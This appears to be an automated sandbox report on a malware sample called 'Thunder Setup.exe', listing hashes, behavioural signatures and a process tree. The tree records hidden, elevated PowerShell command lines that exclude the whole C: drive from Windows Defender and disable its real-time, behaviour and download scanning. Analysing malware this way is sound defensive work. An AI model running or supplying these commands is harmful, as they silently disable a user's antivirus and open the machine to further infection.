Analysis
- max time kernel: 301s
- max time network: 276s
- platform: windows10-2004_x64
- resource: win10v2004-20240709-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 14/07/2024, 22:14
Static task: static1
Behavioral task behavioral1: Sample Thunder Setup.exe, Resource win7-20240708-en
Behavioral task behavioral2: Sample Thunder Setup.exe, Resource win10-20240404-en
Behavioral task behavioral3: Sample Thunder Setup.exe, Resource win10v2004-20240709-en
Behavioral task behavioral4: Sample Thunder Setup.exe, Resource win11-20240709-en
General
- Target: Thunder Setup.exe
- Size: 78KB
- MD5: 1eb797341e423c83060a36b92c720cc9
- SHA1: 380828212f0bb9a82d568491247a590a316e4351
- SHA256: 0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177
- SHA512: 9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b
- SSDEEP: 1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 9 IoCs)
Run Powershell and hide display window.
pid   Process
4696  Powershell.exe
3132  Powershell.exe
2592  Powershell.exe
2500  Powershell.exe
4696  Powershell.exe
1404  powershell.exe
3392  powershell.exe
3872  powershell.exe
4808  powershell.exe

Suspicious behavior: EnumeratesProcesses (16 IoCs)
pid   Process
2500  Powershell.exe
2592  Powershell.exe
4696  Powershell.exe
3132  Powershell.exe
2592  Powershell.exe
2500  Powershell.exe
4696  Powershell.exe
3132  Powershell.exe
4808  powershell.exe
3872  powershell.exe
1404  powershell.exe
3392  powershell.exe
4808  powershell.exe
3872  powershell.exe
1404  powershell.exe
3392  powershell.exe

Suspicious use of AdjustPrivilegeToken (8 IoCs)
description              pid   Process
Token: SeDebugPrivilege  3132  Powershell.exe
Token: SeDebugPrivilege  4696  Powershell.exe
Token: SeDebugPrivilege  2500  Powershell.exe
Token: SeDebugPrivilege  2592  Powershell.exe
Token: SeDebugPrivilege  4808  powershell.exe
Token: SeDebugPrivilege  3872  powershell.exe
Token: SeDebugPrivilege  1404  powershell.exe
Token: SeDebugPrivilege  3392  powershell.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
pid   Process
4092  javaw.exe

Suspicious use of WriteProcessMemory (27 IoCs)
description                       pid   Process            procid_target
PID 4224 wrote to memory of 4092  4224  Thunder Setup.exe  84
PID 4224 wrote to memory of 4092  4224  Thunder Setup.exe  84
PID 4224 wrote to memory of 4092  4224  Thunder Setup.exe  84
PID 4092 wrote to memory of 4696  4092  javaw.exe          85
PID 4092 wrote to memory of 4696  4092  javaw.exe          85
PID 4092 wrote to memory of 4696  4092  javaw.exe          85
PID 4092 wrote to memory of 3132  4092  javaw.exe          86
PID 4092 wrote to memory of 3132  4092  javaw.exe          86
PID 4092 wrote to memory of 3132  4092  javaw.exe          86
PID 4092 wrote to memory of 2500  4092  javaw.exe          87
PID 4092 wrote to memory of 2500  4092  javaw.exe          87
PID 4092 wrote to memory of 2500  4092  javaw.exe          87
PID 4092 wrote to memory of 2592  4092  javaw.exe          89
PID 4092 wrote to memory of 2592  4092  javaw.exe          89
PID 4092 wrote to memory of 2592  4092  javaw.exe          89
PID 2500 wrote to memory of 4808  2500  Powershell.exe     93
PID 2500 wrote to memory of 4808  2500  Powershell.exe     93
PID 2500 wrote to memory of 4808  2500  Powershell.exe     93
PID 2592 wrote to memory of 3872  2592  Powershell.exe     94
PID 2592 wrote to memory of 3872  2592  Powershell.exe     94
PID 2592 wrote to memory of 3872  2592  Powershell.exe     94
PID 4696 wrote to memory of 1404  4696  Powershell.exe     95
PID 4696 wrote to memory of 1404  4696  Powershell.exe     95
PID 4696 wrote to memory of 1404  4696  Powershell.exe     95
PID 3132 wrote to memory of 3392  3132  Powershell.exe     96
PID 3132 wrote to memory of 3392  3132  Powershell.exe     96
PID 3132 wrote to memory of 3392  3132  Powershell.exe     96
Processes

[1] C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"
    - Suspicious use of WriteProcessMemory
    PID: 4224

    [2] C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
        - Suspicious use of SetWindowsHookEx
        - Suspicious use of WriteProcessMemory
        PID: 4092

        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
            Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 4696

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 1404

        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
            Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 3132

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 3392

        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
            Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 2500

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 4808

        [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
            Command line: Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 2592

            [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID: 3872
Network
MITRE ATT&CK Enterprise v15
Downloads